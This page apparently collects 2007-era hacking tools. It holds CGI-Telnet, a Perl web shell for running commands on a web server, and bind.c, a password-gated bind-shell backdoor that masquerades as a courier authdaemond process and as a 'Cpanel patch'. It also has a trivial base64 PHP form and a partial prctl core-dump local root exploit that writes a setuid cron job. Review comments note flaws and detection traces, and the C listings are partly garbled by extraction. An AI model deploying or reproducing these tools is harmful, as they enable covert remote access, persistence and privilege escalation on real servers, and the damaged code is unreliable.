

cgitelnet.txt
March 25, 2007, 3:19 pm

#!/usr/bin/perl
#——————————————————————————
# Copyright and Licence
#——————————————————————————
# CGI-Telnet Version 1.0 for NT and Unix : Run Commands on your Web Server
#
# Copyright (C) 2001 Rohitab Batra
# Permission is granted to use, distribute and modify this script so long
# as this copyright notice is left intact. If you make changes to the script
# please document them and inform me. If you would like any changes to be made
# in this script, you can e-mail me.
#
# Author: Rohitab Batra
# Author e-mail: rohitab@rohitab.com
# Author Homepage: http://www.rohitab.com/
# Script Homepage: http://www.rohitab.com/cgiscripts/cgitelnet.html
# Product Support: http://www.rohitab.com/support/
# Discussion Forum: http://www.rohitab.com/discuss/
# Mailing List: http://www.rohitab.com/mlist/
#——————————————————————————

#——————————————————————————
# Installation
#——————————————————————————
# To install this script
#
# 1. Modify the first line “#!/usr/bin/perl” to point to the correct path on
# your server. For most servers, you may not need to modify this.
# 2. Change the password in the Configuration section below.
# 3. If you’re running the script under Windows NT, set $WinNT = 1 in the
# Configuration Section below.
# 4. Upload the script to a directory on your server which has permissions to
# execute CGI scripts. This is usually cgi-bin. Make sure that you upload
# the script in ASCII mode.
# 5. Change the permission (CHMOD) of the script to 755.
# 6. Open the script in your web browser. If you uploaded the script in
# cgi-bin, this should be http://www.yourserver.com/cgi-bin/cgitelnet.pl
# 7. Login using the password that you specified in Step 2.
#——————————————————————————

#——————————————————————————
# Configuration: You need to change only $Password and $WinNT. The other
# values should work fine for most systems.
#——————————————————————————
# Shared secret for the login form, stored in clear text inside the script.
# PerformLogin compares it with a plain string `eq` and then copies the same
# value into the SAVEDPWD cookie, so read access to this file or a captured
# cookie discloses it.
$Password = “ernasayang”; # Change this. You will need to enter this
# to login.

$WinNT = 0; # Set this to 1 if the script runs on a Windows NT
# machine. On Unix the value can be left as it is.

$NTCmdSep = “&”; # Character used to separate two commands
# in a command line on Windows NT.

$UnixCmdSep = “;”; # Character used to separate two commands
# in a command line on Unix.

$CommandTimeoutDuration = 100; # Time in seconds after which commands are killed.
# Useful for commands that may hang or that take
# very long to execute, like "find /". ExecuteCommand
# arms alarm() with this value only when $WinNT is
# false, so it has no effect on NT servers.

$ShowDynamicOutput = 1; # If this is 1, output is sent to the browser as
# soon as it is produced; otherwise it is buffered
# and sent when the command completes. Useful for
# commands like ping, whose output arrives over time.

# Values below are derived from the settings above.

# Separator placed between the chained shell commands built in ExecuteCommand.
$CmdSep = ($WinNT ? $NTCmdSep : $UnixCmdSep);
# Command whose output reports the working directory after an internal "cd".
$CmdPwd = ($WinNT ? “cd” : “pwd”);
# Path separator for the selected platform.
$PathSep = ($WinNT ? “\\” : “/”);
# Redirection suffix appended to every command line so that error output
# is returned to the browser along with normal output.
$Redirector = ($WinNT ? ” 2>&1 1>&2″ : ” 1>&1 2>&1″);

#——————————————————————————
# Reads the input sent by the browser and parses the input variables. It
# parses GET, POST and multipart/form-data that is used for uploading files.
# The filename is stored in $in{‘f’} and the data is stored in $in{‘filedata’}.
# Other variables can be accessed using $in{‘var’}, where var is the name of
# the variable. Note: Most of the code in this function is taken from other CGI
# scripts.
#——————————————————————————
sub ReadParse
{
# Parses the CGI request into %in. Handles GET query strings, url-encoded
# POST bodies and multipart/form-data uploads. Every value stored here is
# taken from the request without validation.

# Alias the caller's typeglob as *in when one is passed; otherwise the
# package-level $in / @in / %in are used.
local (*in) = @_ if @_;
local ($i, $loc, $key, $val);

# True when the request is a multipart upload.
$MultipartFormData = $ENV{‘CONTENT_TYPE’} =~ /multipart\/form-data; boundary=(.+)$/;

if($ENV{‘REQUEST_METHOD’} eq “GET”)
{
$in = $ENV{‘QUERY_STRING’};
}
elsif($ENV{‘REQUEST_METHOD’} eq “POST”)
{
# NOTE(review): `&` is the bitwise operator here, not the logical `&&`.
binmode(STDIN) if $MultipartFormData & $WinNT;
# Reads exactly CONTENT_LENGTH bytes; no upper bound is applied and the
# return value of read() is not checked.
read(STDIN, $in, $ENV{‘CONTENT_LENGTH’});
}

# handle file upload data
if($ENV{‘CONTENT_TYPE’} =~ /multipart\/form-data; boundary=(.+)$/)
{
$Boundary = ‘–’.$1; # please refer to RFC1867
# The boundary comes from the request header and is interpolated into the
# split pattern as a regular expression (no quotemeta / \Q...\E).
@list = split(/$Boundary/, $in);
# Only the first part is treated as the uploaded file.
$HeaderBody = $list[1];
# Separate the part headers from the part body at the first blank line;
# the text before and after that match becomes $Header and $Body.
$HeaderBody =~ /\r\n\r\n|\n\n/;
$Header = $`;
$Body = $’;
$Body =~ s/\r\n$//; # the last \r\n was put in by Netscape
$in{‘filedata’} = $Body;
# The client-supplied filename is kept with only quotes and whitespace
# removed; directory separators and ".." sequences are not filtered here.
# NOTE(review): how $in{'f'} is used afterwards is outside this listing.
$Header =~ /filename=\”(.+)\”/;
$in{‘f’} = $1;
$in{‘f’} =~ s/\”//g;
$in{‘f’} =~ s/\s//g;

# parse trailer: the remaining parts are ordinary form fields
for($i=2; $list[$i]; $i++)
{
$list[$i] =~ s/^.+name=$//;
$list[$i] =~ /\”(\w+)\”/;
$key = $1;
$val = $’;
# Strip the blank line after the part headers and the trailing newline.
$val =~ s/(^(\r\n\r\n|\n\n))|(\r\n$|\n$)//g;
# Percent-decode the value.
$val =~ s/%(..)/pack(“c”, hex($1))/ge;
$in{$key} = $val;
}
}
else # standard post data (url encoded, not multipart)
{
@in = split(/&/, $in);
foreach $i (0 .. $#in)
{
# "+" encodes a space in url-encoded data.
$in[$i] =~ s/\+/ /g;
# Limit of 2 keeps any further "=" characters inside the value.
($key, $val) = split(/=/, $in[$i], 2);
$key =~ s/%(..)/pack(“c”, hex($1))/ge;
$val =~ s/%(..)/pack(“c”, hex($1))/ge;
# Repeated keys are concatenated. NOTE(review): the literal appended
# between values is empty as shown; a separator may have been lost when
# the page was extracted -- confirm against the original script.
$in{$key} .= “” if (defined($in{$key}));
$in{$key} .= $val;
}
}
}

#——————————————————————————
# Prints the HTML Page Header
# Argument 1: Form item name to which focus should be set
#——————————————————————————
sub PrintPageHeader
{
# Emits the CGI Content-type header followed by the page header text.
# The header comment names a focus-item argument, but @_ is not read in the
# body as shown. $CurrentDir, $HtmlMetaHeader and $ServerName are globals
# set outside this function.
# NOTE(review): the HTML markup of the here-document appears to have been
# stripped when this page was extracted; only its text content remains.

# Percent-encode every non-alphanumeric character of the current directory.
$EncodedCurrentDir = $CurrentDir;
$EncodedCurrentDir =~ s/([^a-zA-Z0-9])/’%’.unpack(“H*”,$1)/eg;
print “Content-type: text/html\n\n”;
print <<END;

$HtmlMetaHeader

# CGI-Telnet Version 1.0 – Connected to $ServerName

Upload File |
Download File |
Disconnect |
Help


END
}

#——————————————————————————
# Prints the Login Screen
#——————————————————————————
sub PrintLoginScreen
{
$Message = q$

 _____  _____  _____          _____        _               _
/  __ \|  __ \|_   _|        |_   _|      | |             | |
| /  \/| |  \/  | |   ______   | |    ___ | | _ __    ___ | |_
| |    | | __   | |  |______|  | |   / _ \| || '_ \  / _ \| __|
| \__/\| |_\ \ _| |_           | |  |  __/| || | | ||  __/| |_
 \____/ \____/ \___/           \_/   \___||_||_| |_| \___| \__| 1.0

                      ______             � 2001, Rohitab Batra
                   .-"      "-.
                  /            \
                 |              |
                 |,  .-.  .-.  ,|
                 | )(_o/  \o_)( |
                 |/     /\     \|
       (@_       (_     ^^     _)
  _     ) \_______\__|IIIIII|__/_______________________
 (_)@8@8{}<________|-\IIIIII/-|________________________>
        )_/        \          /
       (@           `--------`
             W A R N I N G: Private Server

$;
#’
print <<END;

Trying $ServerName...
Connected to $ServerName
Escape character is ^]
$Message
END
}

#------------------------------------------------------------------------------
# Prints the message that informs the user of a failed login
#------------------------------------------------------------------------------
sub PrintLoginFailedMessage
{
print <<END;


login: admin
password:
Login incorrect


END
}

#------------------------------------------------------------------------------
# Prints the HTML form for logging in
#------------------------------------------------------------------------------
sub PrintLoginForm
{
print <<END;

login: admin
password:


END
}

#------------------------------------------------------------------------------
# Prints the footer for the HTML Page
#------------------------------------------------------------------------------
sub PrintPageFooter
{
print "
";
}

#------------------------------------------------------------------------------
# Retrieves the values of all cookies. The cookies can be accessed using the
# variable $Cookies{''}
#------------------------------------------------------------------------------
sub GetCookies
{
# Fills the global %Cookies from the HTTP_COOKIE environment variable.
# Pairs are split on "; " and then on "=". The second split has no limit,
# so a value that itself contains "=" is cut at that character. Names and
# values are stored as received, without decoding or validation.
@httpcookies = split(/; /,$ENV{'HTTP_COOKIE'});
foreach $cookie(@httpcookies)
{
($id, $val) = split(/=/, $cookie);
$Cookies{$id} = $val;
}
}

#------------------------------------------------------------------------------
# Prints the screen when the user logs out
#------------------------------------------------------------------------------
sub PrintLogoutScreen
{
print "Connection closed by foreign host.

";
}

#------------------------------------------------------------------------------
# Logs out the user and allows the user to login again
#------------------------------------------------------------------------------
sub PerformLogout
{
# Clears the SAVEDPWD cookie by setting it to an empty value, then shows the
# login page again. The Set-Cookie line is printed first because
# PrintPageHeader ends the HTTP header block with its Content-type line.
# No expiry or other cookie attribute is sent.
print "Set-Cookie: SAVEDPWD=;\n"; # remove password cookie
&PrintPageHeader("p");
&PrintLogoutScreen;
&PrintLoginScreen;
&PrintLoginForm;
&PrintPageFooter;
}

#------------------------------------------------------------------------------
# This function is called to log the user in. If the password matches, it
# displays a page that allows the user to run commands. If the password doesn't
# match or if no password is entered, it displays a form that allows the user
# to log in.
#------------------------------------------------------------------------------
sub PerformLogin
{
# Compares the global $LoginPassword (set outside this function) with
# $Password and renders either the command page or the login page.
#
# Observable properties for review and detection:
#  - The comparison is a plain string `eq` against the clear-text secret.
#  - On success the password itself becomes the session token: it is written
#    into a cookie named SAVEDPWD with no HttpOnly, Secure or expiry
#    attributes, so it is replayed in clear text on later requests.
#    The cookie name is a stable string to look for in HTTP traffic and
#    proxy or web server logs.
#  - Nothing here counts, delays or logs failed attempts.
if($LoginPassword eq $Password) # password matched
{
print "Set-Cookie: SAVEDPWD=$LoginPassword;\n";
&PrintPageHeader("c");
&PrintCommandLineInputForm;
&PrintPageFooter;
}
else # password didn't match
{
&PrintPageHeader("p");
&PrintLoginScreen;
if($LoginPassword ne "") # some password was entered
{
&PrintLoginFailedMessage;
}
&PrintLoginForm;
&PrintPageFooter;
}
}

#------------------------------------------------------------------------------
# Prints the HTML form that allows the user to enter commands
#------------------------------------------------------------------------------
sub PrintCommandLineInputForm
{
$Prompt = $WinNT ? "$CurrentDir> " : "[admin\@$ServerName $CurrentDir]\$ ";
print <<END;

$Prompt


END
}

#------------------------------------------------------------------------------
# Prints the HTML form that allows the user to download files
#------------------------------------------------------------------------------
sub PrintFileDownloadForm
{
$Prompt = $WinNT ? "$CurrentDir> " : "[admin\@$ServerName $CurrentDir]\$ ";
print <<END;

$Prompt download

Filename:

Download:


END
}

#------------------------------------------------------------------------------
# Prints the HTML form that allows the user to upload files
#------------------------------------------------------------------------------
sub PrintFileUploadForm
{
$Prompt = $WinNT ? "$CurrentDir> " : "[admin\@$ServerName $CurrentDir]\$ ";
print <<END;

$Prompt upload

Filename:

Options:  
Overwrite if it Exists

Upload:   


END
}

#------------------------------------------------------------------------------
# This function is called when the timeout for a command expires. We need to
# terminate the script immediately. This function is valid only on Unix. It is
# never called when the script is running on NT.
#------------------------------------------------------------------------------
sub CommandTimeout
{
# SIGALRM handler installed by ExecuteCommand on non-NT systems. It cancels
# the alarm, prints the timeout notice and a fresh command form, then ends
# the CGI process with exit. Nothing in this handler signals the child
# command itself.
if(!$WinNT)
{
alarm(0);
print <<END;


Command exceeded maximum time of $CommandTimeoutDuration second(s).

Killed it!

END
&PrintCommandLineInputForm;
&PrintPageFooter;
exit;
}
}

#------------------------------------------------------------------------------
# This function is called to execute commands. It displays the output of the
# command and allows the user to enter another command. The change directory
# command is handled differently. In this case, the new directory is stored in
# an internal variable and is used each time a command has to be executed. The
# output of the change directory command is not displayed to the users
# therefore error messages cannot be displayed.
#------------------------------------------------------------------------------
sub ExecuteCommand
{
# Runs the command held in the global $RunCommand inside $CurrentDir and
# prints its output into the page. Both globals are set outside this
# function (presumably from request parameters -- confirm against the
# dispatcher, which is not part of this listing).
#
# Every path below builds one string and hands it to the system shell via
# backticks or a piped open. Each request therefore makes the CGI process
# spawn a shell child; a web server process that parents sh or cmd is the
# host-side trace that process-lineage monitoring can alert on.
if($RunCommand =~ m/^\s*cd\s+(.+)/) # it is a change dir command
{
# we change the directory internally. The output of the
# command is not displayed.

$OldDir = $CurrentDir;
# The captured argument is concatenated unquoted, so the whole "cd" line is
# interpreted by the shell; the trailing pwd/cd reports the new directory.
$Command = "cd \"$CurrentDir\"".$CmdSep."cd $1".$CmdSep.$CmdPwd;
# chop removes the last character (the newline) of the reported directory.
chop($CurrentDir = `$Command`);
&PrintPageHeader("c");
$Prompt = $WinNT ? "$OldDir> " : "[admin\@$ServerName $OldDir]\$ ";
# $RunCommand is echoed into the page as shown, without HTML escaping.
print "$Prompt $RunCommand";
}
else # some other command, display the output
{
&PrintPageHeader("c");
$Prompt = $WinNT ? "$CurrentDir> " : "[admin\@$ServerName $CurrentDir]\$ ";
print "$Prompt $RunCommand";
$Command = "cd \"$CurrentDir\"".$CmdSep.$RunCommand.$Redirector;
if(!$WinNT)
{
# Bound the run time: CommandTimeout ends the request on SIGALRM.
$SIG{'ALRM'} = \&CommandTimeout;
alarm($CommandTimeoutDuration);
}
if($ShowDynamicOutput) # show output as it is generated
{
# Unbuffered output so each line reaches the browser immediately.
$|=1;
# Two-argument open with a trailing " |" starts the command through the
# shell and reads its output; the result of open is not checked.
$Command .= " |";
open(CommandOutput, $Command);
# NOTE(review): the loop condition is empty as shown; the filehandle read
# inside the parentheses looks like it was stripped along with the HTML
# tags when this page was extracted.
while()
{
$_ =~ s/(\n|\r\n)$//;
print "$_\n";
}
$|=0;
}
else # show output after command completes
{
print `$Command`;
}
if(!$WinNT)
{
alarm(0);
}
# NOTE(review): prints an empty string as shown; probably closing markup
# that was lost in extraction.
print "";
}
&PrintCommandLineInputForm;
&PrintPageFooter;
}

#------------------------------------------------------------------------------
# This function displays the page that contains a link which allows the user
# to download the specified file. The page also contains a auto-refresh
# feature that starts the download automatically.
# Argument 1: Fully qualified filename of the file to be downloaded
#------------------------------------------------------------------



bind.c
March 17, 2007, 8:28 pm

/* Build-time constants of the listener. PORT and the string assigned to
 * proc are fixed in the compiled binary, so they serve as static
 * indicators when triaging a suspicious executable or socket. */
#define HOME “/”
/* Hard-coded terminal ioctl request numbers and the escape byte used for
 * window-size messages. NOTE(review): the handler that uses ECHAR is
 * only partly present in this listing. */
#define TIOCSCTTY 0×540E
#define TIOCGWINSZ 0×5413
#define TIOCSWINSZ 0×5414
#define ECHAR 0×1d
/* TCP port the listener binds to. */
#define PORT 3100
/* Size passed to read() for the relay buffer. */
#define BUF 32768
#define proc “/usr/libexec/courier-authlib/authdaemond” /* string copied over argv[0] in main(), i.e. the name shown in process listings */

#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

/* Local declaration of the terminal window-size record, used with the
 * hard-coded TIOC*WINSZ request numbers defined at the top of the file.
 * NOTE(review): the header names on the #include lines were lost in
 * extraction, so it cannot be told whether this duplicates a system
 * definition. */
struct winsize {
unsigned short ws_row;
unsigned short ws_col;
unsigned short ws_xpixel;
unsigned short ws_ypixel;
};

/* Socket descriptor used by cb_shell(). Its assignment is not visible in
 * this listing. */
int sc;
/* Clear-text shared secret and banner. Both are stored as plain strings in
 * the compiled binary and can be recovered or matched by string scanning. */
char passwd[] = “letjen123″; /* Change The password */
char motd[] =”=- cpanel login -=\n”;

/* Password gate run on the connected socket `sc`.
 *
 * Behaviour visible in the code:
 *  - The prompt, the password and the banner cross the TCP connection in
 *    clear text; no encryption is applied here.
 *  - read() may return fewer bytes than requested and its result is not
 *    checked; the buffer is never NUL-terminated or initialised.
 *  - strncmp() compares only strlen(passwd) bytes, so any input that
 *    begins with the password is accepted (prefix match).
 *  - On success sizeof(motd) bytes are written, which includes the
 *    terminating NUL of the array.
 *  - On failure a fixed 7-byte message is sent and the process exits.
 */
void cb_shell() {
char buffer[150];

write(sc, “Password: “, 10);
read(sc, buffer, sizeof(buffer));
if (!strncmp(buffer, passwd, strlen(passwd))) {
write(sc, motd, sizeof(motd));
}
else {
write(sc, “DiE!!!\n”, 7);
close(sc); exit(0);
}
}

/* Builds a legacy pty/tty device name from an index.
 *
 * num:  index; bits 4-7 select a letter from `series`, bits 0-3 select a
 *       hexadecimal digit from `subs`.
 * base: path prefix (the caller passes "/dev/pty" or "/dev/tty").
 * buf:  output buffer; it must hold strlen(base) + 3 bytes. No length is
 *       passed in and strcpy() is unbounded, so the size is the caller's
 *       responsibility (open_tty passes a 512-byte buffer).
 */
void get_tty(int num, char *base, char *buf)
{
char series[] = “pqrstuvwxyzabcde”;
char subs[] = “0123456789abcdef”;
int pos = strlen(base);
strcpy(buf, base);
buf[pos] = series[(num >> 4) & 0xF];
buf[pos+1] = subs[num & 0xF];
buf[pos+2] = 0;
}

/* Searches the 256 legacy pty/tty name pairs for one that can be opened.
 *
 * tty, pty: out parameters that receive the two descriptors.
 * Returns 1 when both sides of a pair were opened, 0 when none was found.
 */
int open_tty(int *tty, int *pty)
{
char buf[512];
int i, fd;

/* /dev/ptmx is opened and closed at once; the descriptor is not used and
 * the result of open() is not checked. */
fd = open(“/dev/ptmx”, O_RDWR);
close(fd);

for (i=0; i < 256; i++) {
get_tty(i, “/dev/pty”, buf);
*pty = open(buf, O_RDWR);
if (*pty < 0) continue;
get_tty(i, “/dev/tty”, buf);
*tty = open(buf, O_RDWR);
if (*tty < 0) {
/* Master opened but slave did not: release it and try the next pair. */
close(*pty);
continue;
}
return 1;
}
return 0;
}

/* SIGCHLD handler: re-installs itself, then reaps at most one exited child
 * without blocking (WNOHANG). The signal number argument is unused. */
void sig_child(int i)
{
signal(SIGCHLD, sig_child);
waitpid(-1, NULL, WNOHANG);
}

/* Sends SIGHUP and then SIGTERM to every process in the caller's process
 * group (pid argument 0). The argument `i` is unused.
 * NOTE(review): no call or signal() registration for this function is
 * visible in the listing. */
void hangout(int i)
{
kill(0, SIGHUP);
kill(0, SIGTERM);
}

/* Entry point: sets up a TCP listener, detaches from the terminal and
 * serves connections in a loop.
 *
 * Traces this code leaves on a host, as far as the listing shows:
 *  - argv[0] is overwritten with the string in `proc`, so tools that print
 *    the command line show that name. The kernel's record of the executable
 *    (the /proc/<pid>/exe link on Linux) is not changed by this copy, so a
 *    mismatch between the two identifies the process.
 *  - A listening TCP socket on PORT bound to INADDR_ANY (all interfaces).
 *  - A session leader with working directory "/" and stdin, stdout and
 *    stderr pointed at /dev/null.
 *  - The fixed startup strings printed before the fork.
 */
int main (int argc, char *argv[])
{

int pid;
struct sockaddr_in serv;
struct sockaddr_in cli;
int sock;
char cmd[256];
/* Unbounded copy into the argv[0] storage; the length of the original
 * argv[0] is not checked against the length of proc. */
strcpy (argv[0], proc);
signal (SIGCHLD, SIG_IGN);
sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if (sock < 0) {
perror(“socket”);
return 1;
}

bzero((char *) &serv, sizeof(serv));
serv.sin_family = AF_INET;
serv.sin_addr.s_addr = htonl(INADDR_ANY);
serv.sin_port = htons(PORT);
if (bind(sock, (struct sockaddr *) &serv, sizeof(serv)) < 0) {
perror(“bind”);
return 1;
}
if (listen(sock, 5) < 0) {
perror(“listen”);
return 1;
}
printf(“Cpanel patch is starting Indonoc 2007″); fflush(stdout);
/* The parent reports the child's pid and returns; the child carries on. */
pid = fork();
if (pid !=0 ) {
printf(“OK, pid = %d\n”, pid);
printf(“Cpanelx patch finis\n”);
return 0;
}

/* daemonize: new session, root working directory, stdio to /dev/null */
setsid();
chdir(“/”);
pid = open(“/dev/null”, O_RDWR);
dup2(pid, 0);
dup2(pid, 1);
dup2(pid, 2);
close(pid);
signal(SIGHUP, SIG_IGN);
signal(SIGCHLD, sig_child);
while (1) {
int scli;
int slen;
slen = sizeof(cli);
scli = accept(sock, (struct sockaddr *) &cli, &slen);
/* NOTE(review): the listing is damaged from this line to the end of the
 * loop. Text between "<" and ">" characters appears to have been removed
 * as if it were HTML, so statements are fused and the declarations of
 * pty, fds, buf, wb, ws, rlen and subshell are missing. The surviving
 * fragments show a select()-driven relay that copies bytes between the
 * client socket `scli` and a pty, plus part of a window-size message
 * handler. Nothing more specific can be stated from this text. */
if (scli = MAXENV) || (i scli) ? (pty+1) : (scli+1),
&fds, NULL, NULL, NULL) < 0)
{
break;
}
/* pty -> client */
if (FD_ISSET(pty, &fds)) {
int count;
count = read(pty, buf, BUF);
if (count <= 0) break;
if (write(scli, buf, count) <= 0) break;
}
/* client -> pty */
if (FD_ISSET(scli, &fds)) {
int count;
unsigned char *p, *d;
d = buf;
count = read(scli, buf, BUF);
if (count 5) rlen = 5;
memcpy(wb, p, rlen);
if (rlen < 5) {
read(scli, &wb[rlen], 5 – rlen);
}

/* setup window: columns and rows are taken from bytes of the message */
ws.ws_xpixel = ws.ws_ypixel = 0;
ws.ws_col = (wb[1] << 8) + wb[2];
ws.ws_row = (wb[3] < 0) write(pty, p+5, rlen);
} else
if (write(pty, d, count) <= 0) break;

}
}
/* Session teardown: close descriptors, reap the child process, hang up
 * the terminal and exit this per-connection process. */
close(scli);
close(sock);
close(pty);
waitpid(subshell, NULL, 0);
vhangup();
exit(0);
}
close(scli);
}
}



base64.txt ( encode )
March 9, 2007, 11:45 pm

base64_encode
base64_decode

Masukkan di sini

<?
// Reads two POST fields and prints a result heading when `kata` is set.
// The short open tag depends on the short_open_tag setting, and the array
// keys are written as barewords instead of quoted strings.
$kata=$_POST[kata];
// $base is read but not used in the text that survives here. The form text
// on the page lists base64_encode and base64_decode as the choices.
// NOTE(review): the rest of the echo was lost in extraction. If it invoked
// the function named by $base, the function name is request-controlled and
// should be checked against those two names before use; the result should
// be HTML-escaped before it is echoed -- confirm against the original file.
$base=$_POST[base];
if(isset($kata)){
echo “Hasil
“;
}
?>



prctl.c
March 4, 2007, 10:26 am

/* Linux >= 2.6.13 prctl kernel exploit
*
* (C) Julien TINNES
*
* If you read the Changelog from 2.6.13 you’ve probably seen:
* [PATCH] setuid core dump
*
* This patch mainly adds suidsafe to the suid_dumpable sysctl, but also a new
* per-process, user-settable argument to PR_SET_DUMPABLE.
*
* This flaw allows us to create a root owned coredump into any directory.
* This is trivially exploitable.
*
*/

#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

/* Directory named as the target for the dumped core file (see the header
 * comment: "create a root owned coredump into any directory"). */
#define CROND “/etc/cron.d”
#define BUFSIZE 2048

/* Resource limit pair with both the soft and the hard value set to
 * RLIM_INFINITY. NOTE(review): the setrlimit() call that would apply it
 * lies outside this listing. */
struct rlimit myrlimit={RLIM_INFINITY, RLIM_INFINITY};

/* printf-style template with four %s fields and one %d field. Its last
 * line is a cron entry that runs as root: it changes a path's owner to
 * root:root, sets mode 4755 (setuid) on it, removes a path and sends
 * SIGUSR1 to a pid. How the fields are filled is in main(), which is cut
 * off in this listing.
 *
 * For triage, the first template line is a fixed marker string. Files in
 * /etc/cron.d that do not belong to an installed package, core files in
 * cron directories and newly created setuid-root binaries are the
 * host-side traces to check. The durable remediation is a kernel that
 * carries the upstream fix for the PR_SET_DUMPABLE handling described in
 * the header comment. */
char crontemplate[]=
“#/etc/cron.d/core suid_dumpable exploit\n”
“SHELL=/bin/sh\n”
“PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n”
“#%s* * * * * root chown root:root %s && chmod 4755 %s && rm -rf %s && kill -USR1 %d\n”;

/* Buffers for the formatted template and for a file name (fname is the
 * path executed by sh()). */
char cronstring[BUFSIZE];
char fname[BUFSIZE];

struct timeval te;

/* Signal-handler-shaped function: replaces the current process image with
 * the program at the path stored in the global `fname`. The signal number
 * `sn` is unused and the result of execl() is not checked.
 * NOTE(review): presumably registered for SIGUSR1, matching the
 * "kill -USR1" in crontemplate; the registration is outside this listing. */
void sh(int sn) {
execl(fname, fname, (char *) NULL);
}

int main(int argc, char *argv[]) {

int nw, pid;

if (geteuid() == 0) {
printf(“[+] getting root shell\n”);
setuid(0);
setgid(0);
if (execl(“/bin/sh”, “/bin/sh”, (char *) NULL)) {